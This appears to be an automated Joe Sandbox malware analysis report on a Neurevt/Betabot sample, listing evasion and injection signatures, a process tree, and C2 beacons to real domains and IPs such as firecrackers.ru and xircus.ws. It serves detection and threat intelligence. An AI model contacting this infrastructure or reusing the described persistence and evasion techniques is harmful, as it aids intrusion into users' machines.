Play interactive tour

Edit tour

Windows Analysis Report 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Overview

General Information

Sample Name:	144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe
Analysis ID:	457488
MD5:	c46f1a56503f218c2977b4b42f5aa84b
SHA1:	25449ec8c765f94ffc284022374a9139dc46ebef
SHA256:	144c0621ca5ecb402de01d8f10044f92a2ef917522e4b4955f3760bb17095bac
Tags:	exeNeurevt
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Contains functionality to create processes via WMI

Creates an undocumented autostart registry key

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies Internet Explorer zone settings

Overwrites Windows DLL code with PUSH RET codes

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Changes image file execution options

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Disables exception chain validation (SEHOP)

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Enables driver privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries information about the installed CPU (vendor, model number etc)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe (PID: 4812 cmdline: 'C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe' MD5: C46F1A56503F218C2977B4B42F5AA84B)

explorer.exe (PID: 6068 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

gGRiqYglIOLbY.exe (PID: 4736 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 3888 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 4840 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 2524 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 3544 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 5084 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 4660 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 2392 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 1008 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 3484 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

gGRiqYglIOLbY.exe (PID: 3948 cmdline: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe MD5: 77276DDC82248473D033E2494C438A97)

935aa375omok5c.exe (PID: 5576 cmdline: 'C:\ProgramData\Java Update Controller\935aa375omok5c.exe' MD5: C46F1A56503F218C2977B4B42F5AA84B)

935aa375omok5c.exe (PID: 1836 cmdline: 'C:\ProgramData\Java Update Controller\935aa375omok5c.exe' MD5: C46F1A56503F218C2977B4B42F5AA84B)

935aa375omok5c.exe (PID: 5044 cmdline: 'C:\ProgramData\Java Update Controller\935aa375omok5c.exe' MD5: C46F1A56503F218C2977B4B42F5AA84B)

935aa375omok5c.exe (PID: 4672 cmdline: 'C:\ProgramData\Java Update Controller\935aa375omok5c.exe' MD5: C46F1A56503F218C2977B4B42F5AA84B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Show sources

Source: xircus.ws

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Virustotal: Detection: 62%			Perma Link
Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	ReversingLabs: Detection: 67%

Machine Learning detection for sample

Show sources

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Joe Sandbox ML: detected

Source: 28.2.935aa375omok5c.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 24.2.935aa375omok5c.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.2.935aa375omok5c.exe.21b0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 26.2.935aa375omok5c.exe.1fb0000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 22.2.935aa375omok5c.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 24.0.935aa375omok5c.exe.400000.0.unpack	Avira: Label: TR/Patched.Gen
Source: 22.0.935aa375omok5c.exe.400000.0.unpack	Avira: Label: TR/Patched.Gen
Source: 28.0.935aa375omok5c.exe.400000.0.unpack	Avira: Label: TR/Patched.Gen
Source: 22.2.935aa375omok5c.exe.2200000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.935aa375omok5c.exe.4c0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.6a0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.935aa375omok5c.exe.a50000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.400000.0.unpack	Avira: Label: TR/Patched.Gen
Source: 26.2.935aa375omok5c.exe.7b0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.935aa375omok5c.exe.4c0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 26.2.935aa375omok5c.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.6e0000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.935aa375omok5c.exe.520000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 26.0.935aa375omok5c.exe.400000.0.unpack	Avira: Label: TR/Patched.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Unpacked PE file: 0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.400000.0.unpack
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 22.2.935aa375omok5c.exe.400000.0.unpack
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 24.2.935aa375omok5c.exe.400000.0.unpack
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 26.2.935aa375omok5c.exe.400000.0.unpack
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Unpacked PE file: 28.2.935aa375omok5c.exe.400000.0.unpack

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 91.234.34.80:443 -> 192.168.2.3:49753 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49752 -> 91.234.34.80:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49754 -> 91.234.34.80:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49759 -> 91.234.34.80:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49768 -> 64.70.19.203:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49770 -> 64.70.19.203:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49771 -> 64.70.19.203:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49772 -> 91.234.34.80:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49774 -> 91.234.34.80:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49776 -> 91.234.34.80:80
Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.3:49778 -> 64.70.19.203:80

Source: Joe Sandbox View

IP Address: 64.70.19.203 64.70.19.203

Source: Joe Sandbox View	ASN Name: CENTURYLINK-LEGACY-SAVVISUS CENTURYLINK-LEGACY-SAVVISUS
Source: Joe Sandbox View	ASN Name: THEHOST-ASUA THEHOST-ASUA

Source: Joe Sandbox View

JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c

Source: global traffic	HTTP traffic detected: POST /kin/logout.php?id=5477845 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: firecrackers.ruContent-Length: 1067Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /kin/logout.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: firecrackers.ru
Source: global traffic	HTTP traffic detected: POST /kin/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: firecrackers.ruContent-Length: 1099Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /kin/logout.php?page=23 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: firecrackers.ruContent-Length: 1108Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /kin/logout.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: firecrackers.ru
Source: global traffic	HTTP traffic detected: POST /kin/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xircus.wsContent-Length: 1090Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /kin/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xircus.wsContent-Length: 1111Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /kin/logout.php?id=5447518 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xircus.wsContent-Length: 1093Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /kin/logout.php?pid=660 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: firecrackers.ruContent-Length: 1084Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /kin/logout.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: firecrackers.ru
Source: global traffic	HTTP traffic detected: POST /kin/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: firecrackers.ruContent-Length: 1105Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /kin/logout.php?id=6303254 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: firecrackers.ruContent-Length: 1057Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /kin/logout.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: firecrackers.ru
Source: global traffic	HTTP traffic detected: POST /kin/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xircus.wsContent-Length: 1072Cache-Control: no-cache

Source: global traffic	HTTP traffic detected: GET /kin/logout.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: firecrackers.ru
Source: global traffic	HTTP traffic detected: GET /kin/logout.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: firecrackers.ru
Source: global traffic	HTTP traffic detected: GET /kin/logout.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: firecrackers.ru
Source: global traffic	HTTP traffic detected: GET /kin/logout.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: firecrackers.ru

Source: unknown

DNS traffic detected: queries for: flamable.ru

Source: unknown

HTTP traffic detected: POST /kin/logout.php?id=5477845 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: firecrackers.ruContent-Length: 1067Cache-Control: no-cache

Source: explorer.exe, 0000000B.00000003.579179984.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: explorer.exe, 0000000B.00000003.557823867.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: explorer.exe, 0000000B.00000003.579179984.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: explorer.exe, 0000000B.00000003.579179984.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: explorer.exe, 0000000B.00000003.557823867.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAkv
Source: explorer.exe, 0000000B.00000002.735876323.00000000007C0000.00000004.00000020.sdmp, logout[1].htm0.11.dr	String found in binary or memory: http://firecrackers.ru/kin/logout.php
Source: explorer.exe, 0000000B.00000003.579179984.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://firecrackers.ru/kin/logout.php?id=5477845
Source: explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	String found in binary or memory: http://firecrackers.ru/kin/logout.php?id=5477845ers
Source: explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	String found in binary or memory: http://firecrackers.ru/kin/logout.php?id=6303254R
Source: explorer.exe, 0000000B.00000003.557823867.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0/
Source: explorer.exe, 0000000B.00000003.557823867.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: explorer.exe, 0000000B.00000003.566857785.00000000007D4000.00000004.00000001.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: explorer.exe, 0000000B.00000003.566857785.00000000007D4000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 0000000B.00000003.610269971.00000000007DC000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000002.735876323.00000000007C0000.00000004.00000020.sdmp	String found in binary or memory: http://xircus.ws/kin/logout.php
Source: explorer.exe, 0000000B.00000003.610269971.00000000007DC000.00000004.00000001.sdmp	String found in binary or memory: http://xircus.ws/kin/logout.php3F
Source: explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	String found in binary or memory: https://firecrackers.ru/
Source: explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	String found in binary or memory: https://firecrackers.ru/f
Source: explorer.exe, 0000000B.00000003.566927736.00000000007DC000.00000004.00000001.sdmp	String found in binary or memory: https://firecrackers.ru/kin/logout.php
Source: explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	String found in binary or memory: https://firecrackers.ru/kin/logout.php?id=5477845
Source: explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	String found in binary or memory: https://firecrackers.ru/kin/logout.php?id=6303254
Source: explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	String found in binary or memory: https://firecrackers.ru/kin/logout.php?id=6303254p
Source: explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	String found in binary or memory: https://firecrackers.ru/r

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 91.234.34.80:443 -> 192.168.2.3:49753 version: TLS 1.2

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, 00000000.00000002.310354140.000000000082A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Contains functionality to create processes via WMI

Show sources

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, 00000000.00000002.310516074.0000000002380000.00000040.00000001.sdmp

Binary or memory string: EP91%s.manifest%s.configCpuFlushInstructionCache_wcslwr_wcsnicmpwcsstrwcsncpymemsetmemcpyNtQueryInformationThreadNtQueryInformationProcessNtCloseObject ErrorNULL PortUsername required, but NULLTime limit is too shortAlloc Errorhiheh1Windows\CurrentVersion\RunWindows NT\CurrentVersion\Image File Execution Options\%sSOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\PackagesKB%uInstallNamentkrnl/c start "" "%s" /%s "%s" . &CLS . &echo Fixing issues ...&ECHO Issues fixed! . &exit%pRtlQueryElevationFlagsEnableLUA/c start "" "%s" /%s&EXITwbem\WMIC.exeprocess call create "%s %s" SSDPSRVTCPWindows 3.1 Update Service

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process Stats: CPU usage > 98%
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0046B087	0_2_0046B087
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00473955	0_2_00473955
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00471512	0_2_00471512
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00475523	0_2_00475523
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00475A65	0_2_00475A65
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00472E12	0_2_00472E12
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00477AFC	0_2_00477AFC
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00474FE1	0_2_00474FE1
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_0046B087	22_2_0046B087
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_00473955	22_2_00473955
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_00471512	22_2_00471512
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_00475523	22_2_00475523
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_00475A65	22_2_00475A65
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_00472E12	22_2_00472E12
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_00477AFC	22_2_00477AFC
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_00474FE1	22_2_00474FE1
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_0046B087	24_2_0046B087
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00473955	24_2_00473955
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00475A65	24_2_00475A65
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00477AFC	24_2_00477AFC
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00471512	24_2_00471512
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00475523	24_2_00475523
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00472E12	24_2_00472E12
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00474FE1	24_2_00474FE1

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Process token adjusted: Security

Jump to behavior

Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe

Code function: String function: 0046BBC8 appears 38 times

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.phis.evad.winEXE@7/7@24/2

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Virustotal: Detection: 62%
Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	ReversingLabs: Detection: 67%

Source: unknown	Process created: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe 'C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe'
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\ProgramData\Java Update Controller\935aa375omok5c.exe 'C:\ProgramData\Java Update Controller\935aa375omok5c.exe'
Source: unknown	Process created: C:\ProgramData\Java Update Controller\935aa375omok5c.exe 'C:\ProgramData\Java Update Controller\935aa375omok5c.exe'
